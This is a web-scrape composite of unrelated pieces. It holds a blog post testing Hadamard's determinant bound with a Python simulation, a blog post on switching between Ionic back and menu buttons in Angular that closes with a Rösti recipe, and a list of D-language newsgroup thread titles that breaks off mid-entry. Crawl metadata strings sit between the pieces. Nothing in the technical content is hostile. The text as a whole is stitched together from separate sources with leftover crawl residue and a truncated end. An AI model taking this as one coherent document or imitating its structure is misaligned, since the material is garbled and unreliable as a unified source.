For an n by n real matrix A, Hadamard’s upper bound on determinant is where aij is the element in row i and column j. See, for example, [1]. How tight is this upper bound? To find out, let’s write a little Python code to generate random matrices and compare their determinants to Hadamard’s bounds. We’ll take the square root of both sides of Hadamard’s inequality to get an upper bound on the absolute value of the determinant. Hadamard’s inequality is homogeneous: multiplying the matrix A by λ multiplies both sides by λn. We’ll look at the ratio of Hadamard’s bound to the exact determinant. This has the same effect as generating matrices to have a fixed determinant value, such as 1. from scipy.stats import norm from scipy.linalg import det import matplotlib.pyplot as plt import numpy as np # Hadamard's upper bound on determinant squared def hadamard(A): return np.prod(np.sum(A**2, axis=1)) N = 1000 ratios = np.empty(N) dim = 3 for i in range(N): A = norm.rvs(size=(dim, dim)) ratios[i] = hadamard(A)**0.5/abs(det(A)) plt.hist(ratios, bins=int(N**0.5)) plt.show() In this simulation the ratio is very often around 25 or less, but occasionally much larger, 730 in this example. It makes sense that the ratio could be large; in theory the ratio could be infinite because the determinant could be zero. The error is frequently much smaller than the histogram might imply since a lot of small values are binned together. I modified the code above to print quantiles and ran it again. print(min(ratios), max(ratios)) qs = [0.05, 0.25, 0.5, 0.75, 0.95] print( [np.quantile(ratios, q) for q in qs] ) This printed 1.0022 1624.9836 [1.1558, 1.6450, 2.6048, 5.7189, 32.49279] So while the maximum ratio was 1624, the ratio was less than 2.6048 half the time, and less than 5.7189 three quarters of the time. Hadamard’s upper bound can be very inaccurate; there’s no limit on the relative error, though you could bound the absolute error in terms of the norm of the matrix. However, very often the relative error is moderately small. More posts on determinants [1] Courant and Hilbert, Methods of Mathematical Physics, Volume 1. One thought on “Hadamard’s upper bound on determinant” Random Comments: Since the determinant is just the (signed) volume of a box spanned by (say) the row space, just by treating the rows as being orthogonal (even if they aren’t) gives that bound. Since the Hadamard bound is asymmetric between rows and columns, you could get a slightly tighter bound my considering the minimum of the Hadamard bounds of A and transpose(A). I suspect it doesn’t help much.
https://www.johndcook.com/blog/2020/07/22/hadamard-inequality/
CC-MAIN-2022-40
refinedweb
483
65.73
An Ionic page with a back or a menu button and my Swiss recipe to cook Rösti May 11, 2019 Imagine Switzerland, stunning mountains, green grass everywhere, sun is shining, you’ve got a view on the Matterhorn, some cows are sitting peacefully next door doing nothing and your are eating some Rösti with your friends. Have you pictured this lovely time and view in your mind? Sure? Good because that isn’t at all today’s case 😂 I’m in Zürich, it’s super grey outside, it’s rainy, freaking cold and windy but the good point is, it gives me time to write a new blog post 😉 Earlier this week I published a trick I use often about “How to close Ionic modals using the hardware back button” and I thought that I would then share another quick one regarding how to display conditionally a back or menu button in a page of an application developed with Ionic. UX You might ask your self “why such a UX”? Well, you might want to list a page in your menu (navigation “root”) but in the same time, you might want to implement a direct link from another page to that particular page without letting you users become confused about how to come back to the caller page (navigation “forward”). I guess you might be confused about my explanation 🤔 Therefore here’s what would happens if we would implement nothing particular. In both cases, navigation “root” or “forward”, the icon its action would remain linked with the menu. And here’s what we are going to achieve: Implementation Our goal is to render an ion-menu-button or an ion-back-button according the navigation as Ionic components are just going to take care of the rest. Therefore, first thing we have to do, is to declare a boolean variable in our page/component to reflect these two states, for example a public boolean variable called canGoBack : canGoBack: boolean = false; Note: in this blog post I display an Angular implementation Once added, we could modify the ion-header of our page and add the two conditional buttons: <ion-header> <ion-toolbar> <ion-buttons <ion-back-button *</ion-back-button> <ion-menu-button *</ion-menu-button> </ion-buttons> <ion-title> Nothing </ion-title> </ion-toolbar> </ion-header> Finally (didn’t I told you, it’s a super quick solution), we just have to implement the code to affect to correct state on our variable when our page/component is loading. For that purpose, Ionic provides a handy IonRouterOutlet which let us know if there is a page in the stack to go back to or none. import {Component, OnInit} from '@angular/core'; import {IonRouterOutlet} from '@ionic/angular'; @Component({ selector: 'app-nothing', templateUrl: 'nothing.page.html', styleUrls: ['nothing.page.scss'] }) export class NothingPage implements OnInit { canGoBack: boolean = false; constructor(private routerOutlet: IonRouterOutlet) { } ngOnInit() { this.canGoBack = this.routerOutlet && this.routerOutlet.canGoBack(); } } That’s it, we have implemented a conditional back or menu button and action 🎉 Cherry on the cake 🍒🎂 I like to always end my articles with a last paragraph “Cherry on the cake” where I give another hint or trick related to the content I displayed but in this particular article I don’t have specific in mind. Therefore, instead of something related to the above solution, here’s my dead simple recipe to cook your own Rösti: These kind of Rösti but with, optionally, smaller pieces of bacon - Boil 500 grams to 1 kilo of potatoes (for two) and once ready, let them cool down. Note: that step is optional, if you don’t have time you could cook the meal with raw potatoes but it’s more yummy with boiled ones. - Chop an onion. - In a stove, warm up some oil and cook briefly the onion. - If you are in a hungry mood and not vegetarian, you could now add some small pieces or cubes of bacons in your stove and cook them too. Not necessary, it had a bit of fat to the recipe but it also add some taste, it’s up to you 😉 - Peel the potatoes. In english I think you would use a tool called a “vegetable peeler” for that purpose, in french the tool is called an “économe”. - Chop the potatoes. For that step you will use a grater or shredder, French I call this tool a “une râpe”. - Tips and tricks: once peeled, if you wait too much before cooking your potatoes might turn “brownish-weird-grey-color” while cooking. To preserve them, instead of just sparing them on the side, if you are a bit slow like me, you could spare them in a boil of (cold) water which will preserve their “integrity”. - Add the chopped potatoes to your stove and gild them for 5 minutes. - Now, bring the heat of the stove down (“medium power”) and shape the potatoes like a cake (“a circle of 20–30 cm diameter and 5 cm height”) with a spatula centered in your stove and DON’T TOUCH THEM for the next 15 minutes, let them cook like this. - After that time, gonna be a bit tricky, put a flat dinner plate on the top of your potatoes and get them out of the fire REVERSED on your plate. - If you feel that your stove is now not enough oily, add a bit of oil in it. - Once done, add back the potatoes we reserved on the plate back on the side which is not yet cooked (get it, that’s why we reversed them)and cook them for another 15 minutes. IMPORTANT: don’t break the cake, the potatoes should remain together, so be gentle in your moves. - 5 minutes before the end of the cooking, if you wish, you could cook one or two fried eggs in another stove which you could later add on the top of the Rösti. I sometimes do that extract step because the yellow part of the egg will work as a nice “binder” to make things a bit less dry and gives a bit of extra calories and fat, in case that would not be enough yet 🤣 That’s it, once the cooking is over, your Rösti are ready to be eat 🤗 To infinity and beyond 🚀 David
https://daviddalbusco.com/blog/an-ionic-page-with-a-back-or-a-menu-button-and-my-swiss-recipe-to-cook-rosti/
CC-MAIN-2020-10
refinedweb
1,049
57.95
Implement Email in Open Event Server In FOSSASIA’s Open Event Server project, we send out emails when various different actions are performed using the API. For example, when a new user is created, he/she receives an email welcoming him to the server as well as an email verification email. Users get role invites from event organisers in the form of emails, when someone buys a ticket he/she gets a PDF link to the ticket as email. So as you can understand all the important informations that are necessary to be notified to the user are sent as an email to the user and sometimes to the organizer as well. In FOSSASIA, we use sendgrid’s API or an SMTP server depending on the admin settings for sending emails. You can read more about how we use sendgrid’s API to send emails in FOSSASIA here. Now let’s dive into the modules that we have for sending the emails. The three main parts in the entire email sending are: - Model – Storing the Various Actions - Templates – Storing the HTML templates for the emails Let’s go through each of these modules one by one. Model USER_REGISTER = 'User Registration' USER_CONFIRM = 'User Confirmation' USER_CHANGE_EMAIL = "User email" INVITE_PAPERS = 'Invitation For Papers' NEXT_EVENT = 'Next Event' NEW_SESSION = 'New Session Proposal' PASSWORD_RESET = 'Reset Password' PASSWORD_CHANGE = 'Change Password' EVENT_ROLE = 'Event Role Invitation' SESSION_ACCEPT_REJECT = 'Session Accept or Reject' SESSION_SCHEDULE = 'Session Schedule Change' EVENT_PUBLISH = 'Event Published' AFTER_EVENT = 'After Event' USER_REGISTER_WITH_PASSWORD = 'User Registration during Payment' TICKET_PURCHASED = 'Ticket(s) Purchased' In the Model file, named as mail.py, we firstly declare the various different actions for which we send the emails out. These actions are globally used as the keys in the other modules of the email sending service. Here, we define global variables with the name of the action as strings in them. These are all constant variables, which means that there value remains throughout and never changes. For example, USER_REGISTER has the value ‘User Registration’, which essentially means that anything related to the USER_REGISTER key is executed when the User Registration action occurs. Or in other words, whenever an user registers into the system by signing up or creating a new user through the API, he/she receives the corresponding emails. Apart from this, we have the model class which defines a table in the database. We use this model class to store the actions performed while sending emails in the database. So we store the action, the time at which the email was sent, the recipient and the sender. That way we have a record about all the emails that were sent out via our server. class Mail(db.Model): __tablename__ = 'mails' id = db.Column(db.Integer, primary_key=True) recipient = db.Column(db.String) time = db.Column(db.DateTime(timezone=True)) action = db.Column(db.String) subject = db.Column(db.String) message = db.Column(db.String) def __init__(self, recipient=None, time=None, action=None, subject=None, message=None): self.recipient = recipient self.time = time if self.time is None: self.time = datetime.now(pytz.utc) self.action = action self.subject = subject self.message = message def __repr__(self): return '<Mail %r to %r>' % (self.id, self.recipient) def __str__(self): return unicode(self).encode('utf-8') def __unicode__(self): return 'Mail %r by %r' % (self.id, self.recipient,) The table name in which all the information is stored is named as mails. It stores the recipient, the time at which the email is sent (timezone aware), the action which initiated the email sending, the subject of the email and the entire html body of the email. In case a datetime value is sent, we use that, else we use the current time in the time field. HTML Templates We store the html templates in the form of key value pairs in a file called system_mails.py inside the helpers module of the API. Inside the system_mails, we have a global dict variable named MAILS as shown below. MAILS = { EVENT_PUBLISH: { 'recipient': 'Organizer, Speaker', 'subject': u'{event_name} is Live', 'message': ( u"Hi {email}<br/>" + u"Event, {event_name}, is up and running and ready for action. Go ahead and check it out." + u"<br/> Visit this link to view it: {link}" ) }, INVITE_PAPERS: { 'recipient': 'Speaker', 'subject': u'Invitation to Submit Papers for {event_name}', 'message': ( u"Hi {email}<br/>" + u"You are invited to submit papers for event: {event_name}" + u"<br/> Visit this link to fill up details: {link}" ) }, SESSION_ACCEPT_REJECT: { 'recipient': 'Speaker', 'subject': u'Session {session_name} has been {acceptance}', 'message': ( u"Hi {email},<br/>" + u"The session <strong>{session_name}</strong> has been <strong>{acceptance}</strong> by the organizer. " + u"<br/> Visit this link to view the session: {link}" ) }, SESSION_SCHEDULE: { 'recipient': 'Organizer, Speaker', 'subject': u'Schedule for Session {session_name} has been changed', 'message': ( u"Hi {email},<br/>" + u"The schedule for session <strong>{session_name}</strong> has been changed. " + u"<br/> Visit this link to view the session: {link}" ) }, Inside the MAILS dict, we have key-value pairs, where in keys we use the global variables from the Model to define the action related to the email template. In the value, we again have 3 different key-value pairs – recipient, subject and message. The recipient defines the group who should receive this email, the subject goes into the subject part of the email while message forms the body for the email. For subject and message we use unicode strings with named placeholders that are used later for formatting using python’s .format() function. This is the most important part of the entire email sending system since this is the place where the entire email sending functionality is implemented using the above two modules. We have all these functions inside a single file namely mail.py inside the helpers module of the API. Firstly, we import two things in this file – The global dict variable MAILS defined in the template file above, and the various global action variables defined in the model. There is one main module which is used by every other individual modules for sending the emails defined as send_email(to, action, subject, html). This function takes as parameters the email to which the email is to be sent, the subject string, the html body string along with the action to store it in the database. Firstly we ensure that the email address for the recipient is present and isn’t an empty string. After we have ensured this, we retrieve the email service as set in the admin settings. It can either be “smtp” or “sendgrid”. The email address for the sender has different formatting depending on the email service we are using. While sendgrid uses just the email say for example “[email protected]”, smtp uses a format a little different like this: Medozonuo Suohu<[email protected]>. So we set that as well in the email_from variable. def send_email(to, action, subject, html): """ Sends email and records it in DB """ } if not current_app.config['TESTING']: if email_service == 'smtp': smtp_encryption = get_settings()['smtp_encryption'] if smtp_encryption == 'tls': smtp_encryption = 'required' elif smtp_encryption == 'ssl': smtp_encryption = 'ssl' elif smtp_encryption == 'tls_optional': smtp_encryption = 'optional' else: smtp_encryption = 'none' config = { 'host': get_settings()['smtp_host'], 'username': get_settings()['smtp_username'], 'password': get_settings()['smtp_password'], 'encryption': smtp_encryption, 'port': get_settings()['smtp_port'], } from tasks import send_mail_via_smtp_task send_mail_via_smtp_task.delay(config, payload) After this we create the payload containing the email address for the recipient, the email address of the sender, the subject of the email and the html body of the email. For unittesting and any other testing we avoid email sending since that is really not required in the flow. So we check that the current app is not configured to run in a testing environment. After that we have two different implementation depending on the email service used. SMTP There are 3 kind of possible encryptions for the email that can be used with smtp server – tls, ssl and optional. We determine this based on the admin settings again. Also, from the admin settings we collect the host, username, password and port for the smtp server. After this we start a celery task for sending the email. Since email sending to a number of clients can be time consuming so we do it using the celery queueing service without disturbing the main workflow of the entire system. @celery.task(name='send.email.post.smtp') def send_mail_via_smtp_task(config, payload):['html']) message.rich = payload['html'] mailer.send(message) mailer.stop() Inside the celery task, we use the Mailer and Message classes from the marrow module of python. We configure the Mailer according to the various settings received from the admin and then use the payload to send the email. Sendgrid For sending email using the sendgrid API, we need to set the Bearer key which is used for authenticating the email service. This key is also defined in the admin settings. After we have set the Bearer key as the authorization header, we again initiate the celery task corresponding to the sendgrid email sending service. @celery.task(name='send.email.post') def send_email_task(payload, headers): requests.post( "", data=payload, headers=headers ) For sending the email service, all we need to do is make a POST request to the api endpoint “” with the headers which contains the Bearer Key and the data which contains the payload containing all the information related to the recipient, sender, subject of email and the body of the email. Apart from these, this module implements all the individual functions that are called based on the various functions that occur. For example, let’s look into the email sending function in case a new session is created. def send_email_new_session(email, event_name, link): """email for new session""" send_email( to=email, action=NEW_SESSION, subject=MAILS[NEW_SESSION]['subject'].format( event_name=event_name ), html=MAILS[NEW_SESSION]['message'].format( email=email, event_name=event_name, link=link ) ) This function is called inside the Sessions API, for every speaker of the session as well as for every organizer of the event to which the session is submitted. Inside this function, we use the send_email(). But firstly we need to create the subject of the email and the message body of the email using the templates and by replacing placeholders by actual value using python formatting. MAILS[NEW_SESSION] returns a unicode string: u’New session proposal for {event_name}’ . So what we do is use the .format() function to replace {event_name} by the actual event_name received as parameter. So it is equivalent to doing something like: u'New session proposal for {event_name}'.format(‘FOSSASIA’) which would give us a resulting string of the form: u'New session proposal for FOSSASIA' Similarly, we create the html message body using the templates and the parameters received. After this is done, we make a function call to send_email() which then sends the final email. References: - Read about how to send emails using Sendgrid API: - Read more about various Python String formatting: - Read more about Marrow mailer:
https://blog.fossasia.org/tag/celery/
CC-MAIN-2019-51
refinedweb
1,805
53.61
Apologies if there is a really simple answer to this. After two days of searching I haven't found it. I am scraping a table from a website and building a list of strings by looping. My code works great until there is a comma in one of the values. This is how I'm building the list (looping structure omitted, clearly): record = (name, availability, upc, price) productList.append(",".join(item or "" for item in record)) [u'Product One, In Stock, 999999999999, $99.99', u'Product Two, In Stock, ....] import unicodecsv as csv ... f = open('data.csv', 'wb') w = csv.writer(f, delimiter = ",") w.writerow([x.split(',') for x in productList]) f.close() Stop manually adding and removing commas yourself. That's why the csv/ unicodecsv modules exist, because you'll get stuff like quoting wrong. When building your rows, make them plain sequences ( lists or tuples) of the fields, not the whole row as a single string: productList.append([item or "" for item in record]) # If the or "" is to handle Nones only, module already handles this, so you can simplify: productList.append(record) When writing the rows, they're already in the correct form, so no splitting needed: with open('data.csv', 'wb') as f w = csv.writer(f, delimiter = ",") w.writerows(productList) # writerows call is just faster way to do: # for row in productList: w.writerow(row)
https://codedump.io/share/ckIdb7Xz9P8t/1/write-a-list-of-strings-in-a-list-that-may-or-may-not-contain-commas-to-a-csv-in-python
CC-MAIN-2017-26
refinedweb
230
77.74
In w§gtr I have found myself facing a code which, for the life of me, I just could not understand a few thing in! Seeing as this is the closest board realting to the subject, I shall post my question here - The code I speak of is - class String The parts of my daughter’s organ instructor’s name. @@syllables = [ { ‘Paij’ => ‘Personal’, ‘Gonk’ => ‘Business’, ‘Blon’ => ‘Slave’, ‘Stro’ => ‘Master’, ‘Wert’ => ‘Father’, ‘Onnn’ => ‘Mother’ }, { ‘ree’ => ‘AM’, ‘plo’ => ‘PM’ } ] A method to determine what a certain name of his means. def name_significance parts = self.split( ‘-’ ) syllables = @@syllables.dup signif = parts.collect do |p| syllables.shift[p] end signif.join( ’ ’ ) end end Now, what I could not understand is: Why is @@syllables divided into two hashes? Why is it an array in the first place? And secondly, “syllables.shift[p]”. Playing around I gathered that the .shift[p] method returns the result of hash[p] and extracts the pair from the hash. Yet I was told that the [p] part isn’t an argument! So I can’t seem to fully understand this code… It doesn’t seem to work when I join the two hashes into one, and, again, I can’t understand why. It is probably just a little thing I’m missing, or some-such event. If anyone could be of assistance, I will be very grateful. Yours, -Gill
https://www.ruby-forum.com/t/newbie-question-problem-understanding-w-p-gtr/153383
CC-MAIN-2021-31
refinedweb
229
75.81
On Bifunctor IO and Java's Checked Exceptions The Bifunctor IO data type is a hot topic in the Scala community. In this article however I’m expressing my dislike for it because it shares the same problems as Java’s Checked Exceptions. What is IO? # Normally the IO data type is expressed as: sealed trait IO[+A] { ??? } What this means is that IO is like a thunk, like a function with zero parameters, that upon execution will finally produce an A value, if successful. The type also signals possible side effects that might happen upon execution, but since it behaves like a function (that hasn’t been executed yet), when you are given an IO value you can consider it as being pure (and the function producing it has referential transparency). This means that IO can be used to describe pure computations. Modern IO implementations for JVM are also capable of describing asynchronous processes, therefore you can also think of IO as being: opaque type IO[+A] = () => Future[A] If we had opaque types this would work well ;-) Available implementations are: - cats.effect.IO - monix.eval.Task - scalaz.concurrent.Task (in the 7.2.x and 7.3.x series) Some cool presentations on this subject: - The Making of an IO (ScalaIO FR, 2017) - What Referential Transparency can do for you (ScalaIO FR, 2017) - Monix Task: Lazy, Async and Awesome (flatMap(Oslo), 2016) IO[+A] implements MonadError[IO, Throwable]. And if we’re talking of Cats-Effect or Monix, it also implements Sync among others. This means that IO[+A] can terminate with error, it can terminate in a Throwable, actually reflecting the capabilities of the Java Runtime. This means that this code is legit: import cats.effect.IO import scala.util.Random def genRandomPosInt(max: Int): IO[Int] = IO(Math.floorMod(Random.nextInt(), max)) The astute reader might notice that this isn’t a total function, as it could throw an ArithmeticException. An easy mistake to make. What’s the Bifunctor IO? # I’m going to call this data type BIO, to differentiate it from IO above: sealed trait BIO[E, A] { ??? } Such a type parameterizes the error type in E. This is more or less like usage of Either to express the error, but as you shall see below, they aren’t exactly equivalent: opaque type BIO[E, A] = IO[Either[E, A]] Or in case you’re throwing EitherT in the mix to make that less awkward: import cats.data.EitherT type BIO[E, A] = EitherT[IO, E, A] Exposing the error type would allow one to be very explicit at compile time about the error: def openFile(file: File): BIO[FileNotFoundException, BufferedReader] = // Made up API BIO.delayE { try Right(new BufferedReader(new FileReader(file))) catch { case e: FileNotFoundException => Left(e) } } def genRandomInt: BIO[Nothing, Int] = BIO.delayE(Right(Random.nextInt())) You can see in the first function that we are very explicit about FileNotFoundException being an error that could happen, instructing readers that they should probably do error recovery. And in the second function we could use Nothing as the error type to signal that this operation can in fact produce no error (not really, but let’s go with it 😉). Available implementations: - scalaz/ioeffect, the Scalaz 8 IO, available as a backport for Scalaz 7, by John A. De Goes and other Scalaz contributors - cats-bio by Luka Jacobowitz, inspired by Scalaz 8’s IO, he took Cats-Effect’s IOand changed Throwableto Eas a proof of concept - Worthy to mention is also Unexceptional IO, Luka’s precursor to his BIO implementation, inspired by Haskell’s UIO I think Some articles on this subject: - No More Transformers: High-Performance Effects in Scalaz 8, by John A. De Goes - Rethinking MonadError, by Luka Jacobowitz The premise of these articles is that: - our type system should stop us from being able to write nonsensical error handling code and give us a way to show anyone reading the code that we’ve already handled errors - the performance of EitherTis bad and usage more awkward Naturally, I disagree with the first assertion and I don’t think the second assertion is a problem 😀 The Problems of Java’s Checked Exceptions # While I think that the Bifunctor IO is a cool implementation, that’s pretty useful for certain people, or certain use cases, I believe that ultimately it’s not a good default implementation, as it shares the same problems as Java’s Checked Exceptions. Or in other words, it’s ignoring decades of experience with exceptions, since their introduction in LISP and then in C++, Java, C# and other mainstream languages. The web is littered with articles on why checked exceptions were a bad idea and many of those reasons are also very relevant for an IO[E, A]. Here’s just two such interesting articles: - Checked exceptions I love you, but you have to go - The Trouble with Checked Exceptions, an interview with Anders Hejlsberg But let me explain in more detail … 1. Composition Destroys Specific Error Types # Let’s go with a more serious example: import java.io._ def openFile(file: File): BIO[FileNotFoundException, BufferedReader] = // Made up API BIO.delayE { try Right(new BufferedReader(new FileReader(file))) catch { case e: FileNotFoundException => Left(e) } } def readLine(in: BufferedReader): BIO[IOException, String] = BIO.delayE { try Right(in.readLine()) catch { case e: IOException => Left(e) } finally in.close() } def convertToNumber(nr: String): BIO[NumberFormatException, Long] = BIO.delayE { try Right(nr.toLong) catch { case e: NumberFormatException => Left(e) } } What would be the type of a composition of multiple IO values like this? for { buffer <- openFile(file) line <- readLine(buffer) num <- convertToNumber(line) } yield num That’s right, you’ll have a Throwable on your hands. And this is assuming that we’ve got a flatMap that widens the result to the most specific super-type, otherwise you’ll have to take care of conversions manually, at each step. Also note that our usage of Throwable is irrelevant for the problem at hand. You could come up with your own error type, but Throwable is actually more practical, because we can simply cast it. So assuming a flatMap that doesn’t automatically widen the error type of the result, what you’ll have to deal with is actually worse: for { buffer <- openFile(file).leftWiden[Throwable] line <- readLine(buffer).leftWiden[Throwable] num <- convertToNumber(line).leftWiden[Throwable] } yield num Not sure how people feel about this, but to me this isn’t an improvement over the status quo, far from it, this is just noise polluting the code. And before you say anything in its defence, make sure the argument doesn’t also apply to Java and everything you dislike about it 😉 2. You Don’t Recover From Errors Often # Imagine a piece of code like this: for { r1 <- op1 r2 <- op2 r3 <- op3 } yield r1 + r2 + r3 So we are executing 3 operations in sequence and each of them can fail, we don’t know which or how. Does it matter? Most of the time, you don’t care. Most of the time it is irrelevant. Most of the time you can’t even recover until later. Due to this uncertainty about which operations trigger errors and which don’t, the premise of a Bifunctor IO is that we’re forced to do attempt (error recovery) everywhere, but that is not a correct premise. The way exceptions work and why they were introduced in LISP and later in C++, is that you only catch exceptions at the point were you can actually do something about it, otherwise it’s fine to live in blissful ignorance. Empirical evidence suggests that most checked exceptions in Java are either ignored or re-thrown, forcing people to write catch blocks that are meaningless and even error prone. You can even find some studies on handling of checked exceptions in Java projects, although I’m unsure about how good they are. For example there’s Analysis of Exception Handling Patterns in Java Projects, which states that: “Results of this study indicate that most programmers ignore checked exceptions and leave them unnoticed. Additionally, it is observed that classes higher in the exception class hierarchy are more frequently used as compared to specific exception subclasses.” Consider that in case of a web server the recovery might be something as simple as showing the user an HTTP 500 status. HTTP 500 statuses are a problem, but only if they happen and when they start to show up, you can then go back and fix what needs to be fixed. Also remember the FileNotFoundException we mentioned above? Well, in most cases there’s not much you can do about it. It’s not like you’ve got much choice in the knowledge that the file is missing, most of the time the important bit being that an error, any error, happened. To quote Anders Hejlsberg, the original designer.” In other words the most important part of exceptions are the finalizers, recovery being less frequent. 3. The Error Type is an Encapsulation Leak # Lets say that we have this function: def foo(param: A): BIO[FileNotFoundException, B] By saying that it can end with a FileNotFoundException, we are instructing all callers, at all call sites, to handle this error as part of the exposed API. It’s pretty obvious that FileNotFoundException can happen due to trying to open a file on disk that is missing. It’s a very specific error, isn’t it, the kind of error we’re supposed to like if we’re fans of EitherT or of the Bifunctor IO. Well, what happens if we change foo to make an HTTP request instead, or maybe we turn it into something that reads a memory location. Now all of a sudden FileNotFoundException is no longer a possibility. def foo(param: A): BIO[Unit, B] This then bubbles down to all call sites, effectively breaking backwards compatibility, so all that depend on your foo will have to upgrade and recompile. And as the author of foo you’ll be faced with two choices: - break compatibility - keep lying to your users that foocan end with a FileNotFoundExceptionand thus leave them with unreachable code - which is something that some Java libraries are known to have done NOTE: there are cases in which you want to break binary compatibility in case the error type changes. That is precisely the use case for which the Bifunctor IO or EitherT are recommended. 4. It Pushes Complexity to the User # On utility I deeply understand the need to parameterize all things. But the question is, what else could we parameterize and why aren’t we doing it? - we could have a type parameter that says whether the operation is blocking-IO bound, or CPU bound and in this way we could avoid running an IOthat’s CPU-bound on a thread-pool meant for blocking I/O or vice-versa - we could add a type parameter for the execution model — is it synchronous or asynchronous? - we could describe the side effect with a type parameter — i.e. is it doing PostgreSQL queries, or ElasticSearch inserts and in this way the type becomes more transparent and you could come up with rules for what’s safe to execute in parallel or what not - add your own pet peeve … I’m fairly sure that people have attempted these. I’m fairly sure that there might even be libraries around that are useful in certain specific instances. But they are not mainstream. We aren’t doing it because adding type parameters to the types we are using leads to the death of the compiler, not to mention our own understanding of the types involved, plus usage becomes that much harder, because by introducing type parameters, values with different type arguments no longer compose without explicit conversion / widening, pushing a lot of complexity to the user. This is why EitherT is cool, even with all of its problems. It’s cool because it can be bolted on, when you need it, adding that complexity only when necessary. The Bifunctor IO[E, A] looks cool, but what happens downstream to the types using it? Monix’s Iterant for example is Iterant[F[_], A]. Should it be Iterant[F[_], E, A]? Or maybe Iterant[F[Throwable, _], A]? Or Iterant[F[_, _], E, A]? If I parameterize the error in Iterant, how could it keep on working with the current IO that doesn’t have a E parameter? And if Iterant works with IO[Throwable, _], then what’s the point of IO[E, A] anyway? Note that having multiple type parameters is a problem in Haskell too. Martin Odersky already expressed his dislike for type classes of multiple type parameters, such as MonadError and it’s pretty telling that type classes with multiple type parameters are not part of standard Haskell. 5. The Bifunctor IO Doesn’t Reflect the Runtime # I gave this piece of code above and I’m fairly sure that you missed the bug in it: def readLine(in: BufferedReader): BIO[IOException, String] = BIO.delayE { try Right(in.readLine()) catch { case e: IOException => Left(e) } finally in.close() } The bug is that in.close() can throw exceptions as well. Actually on top of the JVM even pure, total functions can throw InterruptedException for example. So what happens next? Well the Bifunctor IO cannot represent just any Throwable. By making E generic, it means that handling of Throwable is out. So at this point there are about 3 possibilities: - crash the process, which would be the default, naive implementation - your thread crashes without making a sound, logging to a stderr that gets redirected to /dev/null - use something like a custom Java Thread.UncaughtExceptionHandler, or Scalaz’s specific “fiber” error reporter to report such errors somewhere Also the astute reader should notice that by replacing the MonadError handling and recovery by a simple reporter there’s no way to do back-pressured retries. The nature of bugs is that many bugs are non-deterministic. Maybe you’re doing an HTTP request and you’re expecting a number in return, but it gives you an unexpected response - maybe it has a maximum limit of concurrent connections or something. When making requests to web services, wouldn’t it be better to give them some slack? Wouldn’t it be better to do retries with exponential backoff a couple of times before crashing? Or maybe use utilities such as TaskCircuitBreaker? Of course it is. And in the environments I worked on, such instances are very frequent and the processes have to be really resilient to failure and resiliency is built-in only when having the assumption that everything can fail for unknown reasons. In the grand scheme of things, the reason for why this is a huge problem is because IO should reflect the runtime, because IO effectively replaces Java’s call-stack. But the Bifunctor IO no longer does. In the words of Daniel Spiewak, who initiated the Cats-Effect project: “ The JVM runtime is typed to a first order. Which happens to be exactly what the type parameter of IO reflects. I'm not talking about code in general, just IO. IO is the runtime, the runtime is IO. ” “ The whole purpose of IO as an abstraction is to control the runtime. If you pretend that the runtime has a property which it does not, then that control is weakened and can be corrupted (in this case, by uncontrolled crashes). ” “ IO needs to reflect and describe the capabilities of the runtime, for good or for bad. All it takes is an "innocent" throw to turn it all into a lie, and you can't prevent that. ” I agree with that and it shows which developers worked a lot in dynamic environments, this great divide being between those that think types can prove correctness in all cases and those that don’t. If you’re in the former camp, I think Hillel Wayne is eager to prove you wrong 😉 IO Cannot Be an Alias of the Bifunctor IO # You might be temped to say that: type IO[A] = BIO[Throwable, A] This is not true and it gave birth to, what I like to call, the great “No True Functor” debate and fallacy 😜 But details about it would take another article to explain. So it’s enough to say that cats.effect.IO and monix.eval.Task has got you covered in all cases, whereas a Bifunctor IO needs to pretend that developers on top of the JVM can work only with total functions, on top of an environment that actively proves you wrong, thus applying the “let it crash” philosophy on top of a runtime that makes this really expensive to do so (i.e. the JVM is not Erlang). This is another great divide in mentality, although I can see the merits of the arguments on the other side. In such cases it’s relevant by what kind of problems you got burned or not in the past I guess. Final Words # I am not saying that the Bifunctor IO[E, A] is not useful. I’m pretty sure it will prove useful for some use-cases, the same kind of use-cases for which EitherT is useful, except with a less orthogonal design. Well you gain some performance in that process, although when you’re using EitherT it’s debatable whether it matters for those particular use cases. What I am saying is that: - let’s not ignore the two decades of experience we had with Java’s checked exceptions, preceded by another two decades of experience with exceptions in other languages EitherTis useful because it can be bolted on when the need arises, or otherwise it can be totally ignored by people like myself, so let’s not throw the baby with the bath water I do think that IO[E, A] will be a great addition to the ecosystem, as an option over the current status quo. Scala is a great environment. That’s all.
https://alexn.org/blog/2018/05/06/bifunctor-io/
CC-MAIN-2022-21
refinedweb
3,023
58.82
news.digitalmars.com - digitalmars.D.learnDec 31 2005 Why can I convert a d_time to int without error? (21) Dec 30 2005 final variable (7) Dec 28 2005 How do I fix the spawnvp link bug under Linux? (6) Dec 28 2005 Can D perform tilde expansion in paths? (7) Dec 28 2005 Import Conflicts (12) Dec 27 2005 std.stdio not found? (4) Dec 27 2005 Difference by objekt initialisation (2) Dec 24 2005 How to terminate a file in use? (9) Dec 23 2005 desired side effect (6) Dec 22 2005 profiling (2) Dec 21 2005 Protective Attributes and `alias' (1) Dec 20 2005 static virtual members (7) Dec 20 2005 Ddoc examples (1) Dec 18 2005 Strange behaviour of threads (3) Dec 16 2005 Get no MAPFILE (8) Dec 13 2005 win32 build error (4) Dec 13 2005 Ddoc example section (1) Dec 11 2005 Templates ~ best way to limit types? (9) Dec 11 2005 old newsgroup attachments (5) Dec 10 2005 casting a type to a void* (8) Dec 08 2005 Radically different performance on same hardware. (2) Dec 07 2005 compile time variations (10) Dec 07 2005 real time (5) Dec 06 2005 Newbie needs help with getting (what should be a) simple program to compile... (5) Dec 05 2005 Code-coverage (6) Nov 30 2005 Symbol to char[] (11) Nov 30 2005 function pointer vs. delegate (6) Nov 29 2005 std.string.atoi should throw exception (3) Nov 26 2005 prototypes for signal() under linux? (2) Nov 26 2005 Converting pointer to struct in struct declaration from C to D (7) Nov 26 2005 properties of pointers (1) Nov 25 2005 Linking DMD objs with Microsoft's link.exe (6) Nov 23 2005 types of exceptions (3) Nov 23 2005 Template issue? (3) Nov 23 2005 The other topic: character literal types (1) Nov 21 2005 compile/link problems(real newbie question) (9) Nov 21 2005 How to retrieve template parameters (7) Nov 21 2005 Slicing vs memcpy (16) Nov 19 2005 linking C++ to D on windows troubles... (10) Nov 18 2005 int, double and divide by zero (3) Nov 18 2005 combination attributes of both protected and package (2) Nov 16 2005 16 core boards (64b) available (2) Nov 15 2005 how to read a line from stdin ? (3) Nov 15 2005 Link errors with lib files (7) Nov 14 2005 strange problem, 